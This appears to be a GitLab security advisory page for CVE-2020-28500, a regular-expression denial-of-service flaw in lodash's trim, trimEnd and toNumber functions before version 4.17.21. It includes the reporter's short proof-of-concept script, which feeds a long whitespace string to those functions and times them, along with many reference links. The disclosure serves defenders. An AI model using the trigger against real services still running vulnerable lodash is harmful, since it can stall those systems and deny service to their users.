CVE-2020-28500: Regular Expression Denial of Service (ReDoS) in lodash
(updated )
All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.
Steps to reproduce (provided by reporter Liyuan Chen):
var lo = require('lodash');
function build_blank(n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "1";
}
var s = build_blank(50000) var time0 = Date.now();
lo.trim(s)
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);
var time1 = Date.now();
lo.toNumber(s) var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);
var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);
References
- cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
- github.com/advisories/GHSA-29mw-wpgm-hmr9
- github.com/lodash/lodash
- github.com/lodash/lodash/blob/npm/trimEnd.js%23L8
- github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
- github.com/lodash/lodash/pull/5065
- github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7
- github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-28500.yml
- nvd.nist.gov/vuln/detail/CVE-2020-28500
- security.netapp.com/advisory/ntap-20210312-0006
- snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896
- snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894
- snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892
- snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
- snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893
- snyk.io/vuln/SNYK-JS-LODASH-1018905
- www.oracle.com//security-alerts/cpujul2021.html
- www.oracle.com/security-alerts/cpujan2022.html
- www.oracle.com/security-alerts/cpujul2022.html
- www.oracle.com/security-alerts/cpuoct2021.html
Code Behaviors & Features
Detect and mitigate CVE-2020-28500 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →